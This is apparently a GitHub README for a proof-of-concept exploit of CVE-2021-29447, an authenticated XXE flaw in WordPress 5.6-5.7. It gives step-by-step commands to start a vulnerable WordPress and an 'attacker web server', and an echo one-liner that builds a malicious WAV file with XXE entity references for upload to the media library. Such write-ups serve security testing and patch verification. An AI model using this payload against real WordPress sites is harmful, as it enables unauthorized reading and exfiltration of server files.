https://github.com/motikan2010/CVE-2021-29447

WordPress - Authenticated XXE (CVE-2021-29447)

# WordPress 5.6-5.7 - Authenticated (Author+) XXE (CVE-2021-29447)

## Usage

### Step 1. Run WordPress

```
$ make up-wp
```

### Step 2. Run the attacker web server

```
$ make up-mal
```

### Step 3. Generate the malicious WAV file

#### Without wavefile npm (Recommended)

```
$ echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;] >\x00'> malicious.wav
```

#### With wavefile npm

```
$ make make-wav
```

### Step 4. Log in to WordPress and upload the WAV file to New Media

### Step 5. Decode

## References

- [WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8 Security Vulnerability](https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)